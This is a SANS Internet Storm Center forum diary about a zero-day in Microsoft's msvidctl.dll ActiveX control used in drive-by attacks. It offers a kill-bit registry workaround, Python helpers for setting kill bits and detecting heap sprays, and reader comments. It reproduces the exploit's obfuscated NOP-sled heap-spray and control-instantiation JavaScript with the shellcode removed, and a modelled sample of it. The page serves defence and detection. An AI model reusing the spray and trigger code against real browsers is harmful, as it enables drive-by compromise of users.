SANS Internet Storm Center (ISC) InfoSec Forums
0-day in Microsoft DirectShow (msvidctl.dll) used in drive-by attacks

A 0-day exploit targeting the msVidCtl component (msvidctl.dll) of Microsoft DirectShow is being actively used in drive-by attacks hosted on thousands of newly compromised web sites, according to CSIS. The exploit code has been published on a number of Chinese web sites.

Please keep a watchful eye on your AV and IDS/IPS vendors' updates to get coverage as early as possible; with the code publicly available, this exploit is likely to be widely deployed.

A valid workaround for this attack vector is available: set the kill bit for the vulnerable control's CLSID, which stops Internet Explorer from instantiating it. The .reg file below does this for the CLSID used in the exploit:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{0955AC62-BF2E-4CBA-A2B9-A63F772D46CF}]
"Compatibility Flags"=dword:00000400
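The .reg file above covers one CLSID in the native registry view. The following is an added example (Python, written for this page, not code from the ISC diary or from Microsoft) that generates the same kill-bit entries for a list of CLSIDs, also writes the Wow6432Node view that 32-bit Internet Explorer on 64-bit Windows reads, and, when applied directly with winreg, ORs the 0x400 bit into any Compatibility Flags already present instead of overwriting them. The function names, the GUID check and the `_is_64bit_windows` heuristic are this example's own; the registry functions need Windows, the .reg generation and flag arithmetic run anywhere.

```python
"""Kill-bit helper for the msvidctl control (added example, not from the page)."""
import os
import platform
import re
from typing import Iterable, List

KILL_BIT = 0x400   # Compatibility Flags bit that blocks the control in IE
MSVIDCTL_CLSID = "0955AC62-BF2E-4CBA-A2B9-A63F772D46CF"   # CLSID from the exploit

_BASE = r"SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility"
_BASE_WOW64 = r"SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility"
_GUID = re.compile(r"^\{?([0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12})\}?$")


def normalise_clsid(clsid: str) -> str:
    """Return the CLSID as {UPPER-CASE-GUID}; reject anything that is not a GUID."""
    m = _GUID.match(clsid.strip())
    if not m:
        raise ValueError(f"not a CLSID: {clsid!r}")
    return "{" + m.group(1).upper() + "}"


def merge_killbit(existing_flags: int) -> int:
    """Flags to write: keep whatever is already set and add the kill bit."""
    return existing_flags | KILL_BIT


def killbit_key_paths(clsid: str, include_wow64: bool = True) -> List[str]:
    """HKLM-relative key paths for one CLSID: native view, then the 32-bit view."""
    guid = normalise_clsid(clsid)
    paths = [_BASE + "\\" + guid]
    if include_wow64:
        paths.append(_BASE_WOW64 + "\\" + guid)
    return paths


def killbit_reg_text(clsids: Iterable[str], include_wow64: bool = True) -> str:
    """A .reg file (regedit 5.00 format) that kill-bits every CLSID given."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for clsid in clsids:
        for path in killbit_key_paths(clsid, include_wow64):
            lines += [f"[HKEY_LOCAL_MACHINE\\{path}]",
                      f'"Compatibility Flags"=dword:{KILL_BIT:08x}', ""]
    return "\r\n".join(lines)


def _is_64bit_windows() -> bool:
    # PROCESSOR_ARCHITEW6432 is set when a 32-bit process runs under WOW64.
    return "64" in (os.environ.get("PROCESSOR_ARCHITEW6432") or platform.machine())


def _registry_views() -> List[int]:
    """Access flags selecting the 64-bit view and, on x64, the 32-bit view too."""
    import winreg   # Windows-only module, imported lazily
    views = [winreg.KEY_WOW64_64KEY]
    if _is_64bit_windows():
        views.append(winreg.KEY_WOW64_32KEY)
    return views


def is_killbitted(clsid: str) -> bool:
    """True only if every applicable view already carries the kill bit (Windows only)."""
    import winreg
    sub_key = _BASE + "\\" + normalise_clsid(clsid)
    for view in _registry_views():
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, sub_key, 0,
                                winreg.KEY_READ | view) as key:
                flags, kind = winreg.QueryValueEx(key, "Compatibility Flags")
        except FileNotFoundError:
            return False
        if kind != winreg.REG_DWORD or not flags & KILL_BIT:
            return False
    return True


def set_killbit(clsid: str) -> None:
    """Write the kill bit in every view, preserving other flags (needs admin rights)."""
    import winreg
    sub_key = _BASE + "\\" + normalise_clsid(clsid)
    for view in _registry_views():
        with winreg.CreateKeyEx(winreg.HKEY_LOCAL_MACHINE, sub_key, 0,
                                winreg.KEY_READ | winreg.KEY_WRITE | view) as key:
            try:
                flags, _ = winreg.QueryValueEx(key, "Compatibility Flags")
            except FileNotFoundError:
                flags = 0
            winreg.SetValueEx(key, "Compatibility Flags", 0, winreg.REG_DWORD,
                              merge_killbit(flags))
```

Write `killbit_reg_text([...])` to a file and import it with regedit or push it by GPO, or call `set_killbit(MSVIDCTL_CLSID)` from an elevated Python on the host; `is_killbitted(MSVIDCTL_CLSID)` should then return True. Any further CLSIDs you take from the Microsoft advisory go in the same list.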

Details of the exploit are available on the CSIS web site; the relevant portion is reproduced below with the shellcode removed:


var appllaa='0';
// Once the pieces are concatenated and unescaped this is '%u9090%u9090', i.e.
// the bytes 90 90 90 90: an x86 NOP sled, split into fragments to evade simple
// string signatures.
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;

[SHELL CODE REMOVED]   // the removed code presumably defines dashell, the shellcode string

var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
// Double the NOP string until it is at least slackspace characters long.
while(omybro.length<slackspace)
  omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
// Grow each spray block to about 0x30000 characters (roughly 384 KB of NOPs).
while(shuishiMVP.length+slackspace<0x30000)
  shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
// Heap spray: 300 copies of NOP sled + shellcode, so that a corrupted pointer
// into the heap is likely to land in a sled and slide into the shellcode.
memory=new Array();
for(x=0;x<300;x++)
  memory[x]=shuishiMVP+dashell;

// Instantiate the vulnerable control through an <object> element; DivID is a
// container element defined elsewhere in the page.
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.width='1';
myObject.height='1';
myObject.data='./logo.gif';   // data file handed to the control
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';

Stephen

89 Posts
ISC Handler
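Until AV and IDS/IPS signatures catch up, the obfuscation in the exploit above can be undone statically. The following is an added example (Python, written for this page, not code from the ISC diary or CSIS) that folds the split-up string literals (`'%'+'u9'+'0'...`) back together, inlines single-literal `var` definitions such as `appllaa='0'`, unescapes `%uXXXX` the way IE's `unescape()` does, and then reports the heap-spray indicators: single-byte sleds, the spray loop and its copy count, the block-size target, and any reference to the msvidctl CLSID. The function names, the 50-copy threshold and `SAMPLE_HTML` are this example's own; the sample is constructed after the posted snippet and contains placeholder bytes, not shellcode.

```python
"""Static triage for the msvidctl heap-spray pattern (added example, not from the page)."""
import re
from typing import Dict, Optional

# CLSID of the Microsoft Video ActiveX Control (msvidctl.dll), as on the page.
MSVIDCTL_CLSID = "0955AC62-BF2E-4CBA-A2B9-A63F772D46CF"

_LITERAL = re.compile(r"'([^'\n]*)'|\"([^\"\n]*)\"")
_CONCAT = re.compile(r"(?:'[^'\n]*'|\"[^\"\n]*\")(?:\s*\+\s*(?:'[^'\n]*'|\"[^\"\n]*\"))+")
_STRING_VAR = re.compile(r"var\s+([A-Za-z_$][\w$]*)\s*=\s*(?:'([^'\n]*)'|\"([^\"\n]*)\")\s*;")
# for(x=0;x<300;x++) memory[x]=...   -> groups: loop var, copy count, array name
_SPRAY_LOOP = re.compile(
    r"for\s*\(\s*(\w+)\s*=\s*0\s*;\s*\1\s*<\s*(\d+)\s*;[^)]*\)\s*\{?\s*(\w+)\s*\[\s*\1\s*\]\s*=")
# while(s.length+n<0x30000)          -> the per-block size the sled is grown to
_GROW_LOOP = re.compile(r"while\s*\([^)]*\.length[^)]*<\s*(0x[0-9a-fA-F]+|\d+)\s*\)")
_CLSID_REF = re.compile(r"clsid:\s*\{?" + MSVIDCTL_CLSID, re.I)


def inline_string_vars(js: str) -> str:
    """Replace later uses of `var name = 'literal';` with the literal itself."""
    for name, a, b in _STRING_VAR.findall(js):
        lit = a or b
        js = re.sub(r"(?<!var\s)(?<![\w$])" + re.escape(name) + r"(?![\w$])",
                    lambda m, lit=lit: "'" + lit + "'", js)
    return js


def join_literals(js: str) -> str:
    """Fold 'a'+'b'+'c' into 'abc' so a split-up escape sequence becomes visible."""
    return _CONCAT.sub(
        lambda m: "'" + "".join(a or b for a, b in _LITERAL.findall(m.group(0))) + "'",
        js)


def js_unescape(s: str) -> str:
    """Decode %uXXXX and %XX like JavaScript's unescape()."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def sled_bytes(literal: str) -> Optional[int]:
    """If the unescaped literal is one byte value repeated, as IE lays the
    UTF-16 string out in memory, return that byte value, else None."""
    if "%" not in literal:
        return None
    raw = js_unescape(literal).encode("utf-16-le", "surrogatepass")
    if len(raw) >= 4 and len(set(raw)) == 1:
        return raw[0]
    return None


def analyse(html: str) -> Dict[str, object]:
    """Deobfuscate the page's script and report heap-spray and CLSID indicators."""
    js = join_literals(inline_string_vars(html))
    sleds = set()
    for a, b in _LITERAL.findall(js):
        byte = sled_bytes(a or b)
        if byte is not None:
            sleds.add(byte)
    loop = _SPRAY_LOOP.search(js)
    grow = _GROW_LOOP.findall(js)
    report = {
        "sled_byte_values": [f"0x{b:02x}" for b in sorted(sleds)],
        "spray_copies": int(loop.group(2)) if loop else 0,
        "block_size_targets": [int(g, 16) if g.lower().startswith("0x") else int(g)
                               for g in grow],
        "references_msvidctl": bool(_CLSID_REF.search(js)),
    }
    # Heuristic verdict: a sled literal plus a loop that stores many copies of it.
    report["heap_spray"] = bool(sleds) and report["spray_copies"] >= 50
    return report


# Constructed sample modelled on the posted exploit; %u4141%u4242 stands in for
# the shellcode and is not executable code.
SAMPLE_HTML = r"""<html><body><div id="DivID"></div><script>
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape('%u4141%u4242');
var headersize=20;
var omybro=unescape(nndx);
var slackspace=headersize+dashell.length;
while(omybro.length<slackspace) omybro+=omybro;
bZmybr=omybro.substring(0,slackspace);
shuishiMVP=omybro.substring(0,omybro.length-slackspace);
while(shuishiMVP.length+slackspace<0x30000) shuishiMVP=shuishiMVP+shuishiMVP+bZmybr;
memory=new Array();
for(x=0;x<300;x++) memory[x]=shuishiMVP+dashell;
var myObject=document.createElement('object');
DivID.appendChild(myObject);
myObject.data='./logo.gif';
myObject.classid='clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
</script></body></html>"""

if __name__ == "__main__":
    print(analyse(SAMPLE_HTML))
```

On the sample this reports a 0x90 sled, 300 spray copies, a 0x30000 block target and a reference to the msvidctl CLSID. The CLSID check alone is a useful IDS string once the kill bit is deployed; the sled and loop checks also catch the same spray reused against a different control.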
Please note that there is a typo in the CSIS link embedded in the text, it has a double "http://". The correct URL is http://www.csis.dk/en/news/news.asp?tekstID=799
Elton

2 Posts
Thanks, fixed
Stephen

89 Posts
ISC Handler
Hi,
Can we get the English version for the same?
hcbhatt

14 Posts
Google does a fair job:

translate.google.com/…=
Stephen

89 Posts
ISC Handler
Thanks Stephen.
hcbhatt

14 Posts
Microsoft has issued an advisory, here:

http://www.microsoft.com/technet/security/advisory/972890.mspx

This is still an early notice, but includes 45 CLASSIDs for this control, which they do not believe are designed to be exposed via Internet Explorer and thus should be safe to killbit.
Andrew

41 Posts
